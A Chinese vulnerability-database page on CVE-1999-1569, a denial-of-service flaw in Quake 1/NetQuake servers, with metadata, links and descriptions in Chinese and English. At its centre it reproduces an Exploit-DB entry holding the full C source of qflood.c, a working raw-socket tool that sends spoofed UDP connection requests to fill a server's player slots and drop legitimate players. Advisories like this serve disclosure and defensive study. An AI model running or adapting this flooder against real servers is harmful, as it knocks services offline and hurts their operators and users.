CVE-1999-1569
CVSS5.0
发布时间 :2001-07-17 00:00:00
修订时间 :2016-10-17 22:06:03
NMCOES    

[原文]Quake 1 and NetQuake servers allow remote attackers to cause a denial of service (resource exhaustion or forced disconnection) via a flood of spoofed UDP connection packets, which exceeds the server's player limit.


[CNNVD]ID Software Quake 拒绝服务攻击(CNNVD-200107-109)

        CVE(CAN) ID: CAN-1999-1569
        
        
        
        Quake是种ID software开发的非常流行的3D主视角射击游戏。其网络实现存在缺陷,
        
        一个恶意的远程用户可以阻止合法玩家连接Quake服务器。此外,也可能切断已经连
        
        接到Quake服务器的连接。
        
        
        
        <* 来源:Andrew J.Gavin (GAVINA@student.gvsu.edu) *>

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1569
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1569
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-109
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=90221101925989&w=2
(UNKNOWN)  BUGTRAQ  19980502 NetQuake Protocol problem resulting in smurf like effect.
http://marc.info/?l=bugtraq&m=91012172524181&w=2
(UNKNOWN)  BUGTRAQ  19981101 Quake problem?
http://www.securityfocus.com/archive/1/197268
(UNKNOWN)  BUGTRAQ  20010716 Quake client and server denial-of-service
http://www.securityfocus.com/bid/3051
(VENDOR_ADVISORY)  BID  3051
http://xforce.iss.net/static/6871.php
(VENDOR_ADVISORY)  XF  quake-spoofed-client-dos(6871)

- 漏洞信息

ID Software Quake 拒绝服务攻击
中危 其他
2001-07-17 00:00:00 2005-10-20 00:00:00
远程  
        CVE(CAN) ID: CAN-1999-1569
        
        
        
        Quake是种ID software开发的非常流行的3D主视角射击游戏。其网络实现存在缺陷,
        
        一个恶意的远程用户可以阻止合法玩家连接Quake服务器。此外,也可能切断已经连
        
        接到Quake服务器的连接。
        
        
        
        <* 来源:Andrew J.Gavin (GAVINA@student.gvsu.edu) *>

- 公告与补丁

        暂无

- 漏洞信息 (21012)

ID Software Quake 1.9 Denial of Service Vulnerability (EDBID:21012)
multiple dos
2001-07-17 Verified
0 Andy Gavin
N/A [点击下载]
source: http://www.securityfocus.com/bid/3051/info

Quake is a very popular 3D "first-person-shooter" game from ID software.

A flaw has been identified in the product's network play features which allows a maliciously designed client to prevent legitimate players from connecting to the Quake server. Additionally, it is possible to disconnect players that have already connected to the Quake server. 

/*
  qflood.c - Written by Andy Gavin (_k3nny@Efnet,
k@EnterTheGame)
  UDP spoofing idea taken from "arnudp" by Arny
(cs6171@scitsc.wlv.ac.uk)
  Original idea discussed on Bugtraq in 1998.

  This program will fill up a Quake server with spoofed
"unconnected" clients, disallowing other players the
ability to connect to the server since the player limit
fills up quickly.  Additionally, if the server does not
support multiple clients from the same IP address, it will
 disconnect legitimate players if the spoofed connection
request matches that player.

  Compiled on linux 2.2.19 with gcc 2.91.
  Tested to work on all NetQuake servers.
  Vendor status: Not contacted, since id Software has long
abandoned Quake.

  Andy Gavin is not responsible for what you do with this
program.  This is  meant for testing purposes only.

  Greets:
  - Karen;
  - Parents, Tim, Erica, and my dog;
  - insyder, mechtoad, def, ap0k, informer, scythe, zer0v,
fain, and the rest of #clanchat on Efnet;
  - deek, cha0ticz, schmorky, Ir8Pir8, redmund, vise,
_nuclear_, and the rest of #prediction on EnterTheGame;
  - Joe W, Brian L (good luck...and we'll miss you), and the
rest of the crew at work;
  - Steve Yzerman
  - Led Zeppelin, Pearl Jam, Radiohead, and Hum
*/

#include <ctype.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <sys/socket.h>
#include <sys/types.h>

struct sockaddr sa;
struct node
{
  char *address;
  struct node *next;
};

struct node *head = NULL;
struct node *tail;

void add_address( struct node **, char * );
void sig_handler( int );

int main( int argc, char **argv )
{
  int x = 1;
  int source_port, delay, fd;
  struct sockaddr_in *p;
  struct hostent *he;
  struct node *current;
  char *temp;

  u_char thePACKET[41]=
  {
    0x45,                       /* IP version, header len */
    0x00,                       /* IP diff services field */
    0x00, 0x29,                 /* IP total length */
    0xc2, 0xb5,                 /* IP id */
    0x00, 0x00,                 /* IP fragment offset */
    0x80,                       /* IP TTL */
    0x11,                       /* IP protocol */
    0, 0,                       /* IP header checksum */
    0, 0, 0, 0,                 /* IP src */
    0, 0, 0, 0,                 /* IP dest */
    0x00, 0x00,                 /* UDP src port */
    0, 0,                       /* UDP dest port */
    0x00, 0x15,                 /* length = 21 */
    0x00, 0x00,                 /* UDP checksum */
    0x80, 0x00,                 /* Quake flags */
    0x00, 0x0d,                 /* Quake length */
    0x01,                       /* Quake command = connect
*/
    0x51, 0x55, 0x41, 0x4b,     /* Quake game = QUAKE */
    0x45, 0x00,
    0x03, 0x01                  /* Quake version = 3 */
  };

  if( argc != 5 )
  {
    fprintf( stderr, "\nqflood - floods Quake servers with
spoofed connection requests\n" );
    fprintf( stderr, "\tWritten by Andy Gavin (_k3nny@Efnet,
k@ETG)\n" );
    fprintf( stderr, "\tUsage: %s <src> <server>
<server_port> <delay>\n", *argv );
    fprintf( stderr, "\t\tsrc = comma-delimited list of
IPs/hostnames\n" );
    fprintf( stderr, "\t\tserver = Quake server
IP/hostname\n" );
    fprintf( stderr, "\t\tserver_port = Quake server port\n"
);
    fprintf( stderr, "\t\tdelay = delay between connection
requests (in msec)\n" );
    fprintf( stderr, "\t\texample: %s 10.0.0.2,10.0.0.3
10.0.0.10 26000 500\n\n", argv[0] );
    exit( 0 );
  }

  srand( time( NULL ));
  delay = atoi( argv[4] ) * 1000;

  /* build a linked list of addresses entered on command
line */
  temp = strtok( argv[1], "," );
  add_address( &head, temp );

  signal( SIGINT, sig_handler );

  tail = head;

  temp = strtok( NULL, "," );
  while( temp != NULL )
  {
    add_address( &(tail->next), temp );
    tail = tail->next;
    temp = strtok( NULL, "," );
  }

  current = head;

  while( 1 )
  {
    while( current != NULL )
    {
      if( ( he = gethostbyname( current->address )) == NULL
)
      {
        fprintf( stderr, "Can't resolve src\n" );
        exit( 0 );
      }

      bcopy( *( he->h_addr_list ), ( thePACKET + 12 ), 4 );

      if( ( he = gethostbyname( argv[2]) ) == NULL )
      {
        fprintf( stderr, "Can't resolve server\n");
        exit( 0 );
      }

      bcopy( *( he->h_addr_list ), ( thePACKET + 16 ), 4 );

      source_port = rand() % 3976 + 1024;

      *(u_short*)(thePACKET + 20) = htons( (u_short)
source_port );
      *(u_short*)(thePACKET + 22) = htons( (u_short) atoi(
argv[3] ));

      p = ( struct sockaddr_in* ) &sa;
      p->sin_family = AF_INET;
      bcopy( *( he->h_addr_list ), &(p->sin_addr), sizeof(
struct in_addr ) );

      if(( fd=socket( AF_INET, SOCK_RAW, IPPROTO_RAW )) ==
-1 )
      {
        perror( "Can't create raw socket (you must run as
root)" );
        exit( 0 );
      }

      if( setsockopt( fd, IPPROTO_IP, IP_HDRINCL, (char*)&x,
sizeof(x)) < 0 )
      {
        perror( "setsockopt IP_HDRINCL error" );
        exit( 0 );
      }

      if(( sendto( fd, &thePACKET, sizeof(thePACKET), 0,
(struct sockaddr*)p, sizeof(struct sockaddr ))) == -1)
      {
        perror( "sendto error" );
        exit( 0 );
      }

      printf( "Quake connection request sent from %s:%i to
%s:%s\n", current->address, source_port, argv[2], argv[3] );

      usleep( delay );
      current = current->next;
    }
    current = head;
  }
  exit( 1 );
}

void add_address( struct node** reference, char *data )
{
  struct node* new_node = malloc( sizeof( struct node ));

  new_node->address = data;
  new_node->next = *reference;
  *reference = new_node;
}

void sig_handler( int number )
{
  struct node *current = head;
  struct node *next;

  printf( "\nCaught SIGINT.  Cleaning up memory..." );
  while( current != NULL )
  {
    next = current->next;
    free( current );
    current = next;
  }
  printf( "done.\n\n" );
  exit( 1 );
}

		

- 漏洞信息

9848
Quake 1/NetQuake Spoofed UDP Packet Consumption DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2001-07-16 Unknow
2001-07-16 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

ID Software Quake Denial of Service Vulnerability
Origin Validation Error 3051
Yes No
2001-07-17 12:00:00 2009-07-11 06:56:00
Reported to bugtraq by Andrew J.Gavin <GAVINA@student.gvsu.edu> on July 17, 2001. Attributed to a discussion thread in the bugtraq mailing list in 1998.

- 受影响的程序版本

id Software Quake 1.9

- 漏洞讨论

Quake is a very popular 3D "first-person-shooter" game from ID software.

A flaw has been identified in the product's network play features which allows a maliciously designed client to prevent legitimate players from connecting to the Quake server. Additionally, it is possible to disconnect players that have already connected to the Quake server.

- 漏洞利用

qflood.c - Written by Andy Gavin (_k3nny@Efnet,
k@EnterTheGame)

UDP spoofing idea taken from "arnudp" by Arny (cs6171@scitsc.wlv.ac.uk)

Original idea discussed on Bugtraq in 1998.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站